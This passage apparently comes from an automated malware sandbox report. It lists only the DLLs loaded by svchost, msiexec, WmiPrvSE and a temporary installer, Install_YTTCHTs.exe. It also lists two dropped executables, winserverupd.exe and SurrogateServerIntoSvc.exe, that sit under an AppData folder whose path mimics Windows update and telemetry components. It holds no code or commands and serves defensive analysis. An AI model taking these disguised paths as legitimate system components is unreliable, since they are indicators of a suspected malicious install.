            Source: C:\Windows\System32\svchost.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winhttp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msv1_0.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntlmshared.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptdll.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: webio.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mswsock.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: winnsi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rasadhlp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: fwpuclnt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rmclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: usermgrcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: propsys.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: coremessaging.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: execmodelproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: resourcepolicyclient.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vssapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: vsstrace.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samcli.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: samlib.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: es.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: bitsproxy.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dhcpcsvc.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: schannel.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mskeyprotect.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: ncryptsslp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: dpapi.dll
            Source: C:\Windows\System32\svchost.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: acgenral.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: samcli.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: msacm32.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: dwmapi.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: winmmbase.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: winmmbase.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: aclayers.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: sfc.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: sfc_os.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: windowscodecs.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: msi.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: usp10.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: msls31.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: davhlpr.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: msimg32.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: dbghelp.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: wininet.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: cabinet.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: lpk.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: msihnd.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: secur32.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: netapi32.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: wkscli.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: riched20.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: atlthunk.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: textinputframework.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: coreuicomponents.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: coremessaging.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: textshaping.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: explorerframe.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: tsappcmp.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: cryptbase.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: msisip.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: cryptnet.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: iphlpapi.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: winnsi.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: winhttp.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: ondemandconnroutehelper.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: mswsock.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: dhcpcsvc6.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: dhcpcsvc.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: webio.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: dnsapi.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: rasadhlp.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: fwpuclnt.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: pcacli.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: apphelp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: aclayers.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: msi.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: tsappcmp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: wkscli.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: msisip.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: mscoree.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: version.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: rstrtmgr.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: ncrypt.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntasn1.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: pcacli.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: mpr.dll
            Source: C:\Windows\System32\msiexec.exeSection loaded: ntmarta.dll
            Source: C:\Users\user\AppData\Local\Temp\7zS8C89.tmp\Install_YTTCHTs.exeSection loaded: taskschd.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windowmanagementapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: textinputframework.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: inputhost.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: propsys.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coreuicomponents.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: ntmarta.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: coremessaging.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: twinapi.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wintypes.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.ui.immersive.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: profapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: version.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: secur32.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sspicli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: iphlpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: logoncli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: samcli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msasn1.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: apphelp.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: aclayers.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: mpr.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: sfc_os.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: msi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: srpapi.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: tsappcmp.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: uxtheme.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netapi32.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wkscli.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: netutils.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: windows.storage.dll
            Source: C:\Windows\SysWOW64\msiexec.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: profapi.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: sspicli.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: comsvcs.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptsp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: rsaenh.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: cryptbase.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: windows.storage.dll
            Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: winmm.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: uxtheme.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: windows.storage.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: propsys.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: edputil.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: urlmon.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: iertutil.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: srvcli.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: netutils.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: windows.staterepositoryps.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: sspicli.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: wintypes.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: appresolver.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: bcp47langs.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: slc.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: sppc.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: onecorecommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: onecoreuapcommonproxystub.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: pcacli.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: mpr.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\winserverupd.exeSection loaded: sfc_os.dll
            Source: C:\Windows\System32\cmd.exeSection loaded: cmdext.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: mscoree.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: apphelp.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: kernel.appcore.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: version.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: vcruntime140_clr0400.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: ucrtbase_clr0400.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: wldp.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: amsi.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: userenv.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: profapi.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: msasn1.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: gpapi.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: cryptsp.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: rsaenh.dll
            Source: C:\Users\user\AppData\Local\Microwave\Vault\TelemetryHandlers\winupdates\SurrogateServerIntoSvc.exeSection loaded: cryptbase.dll
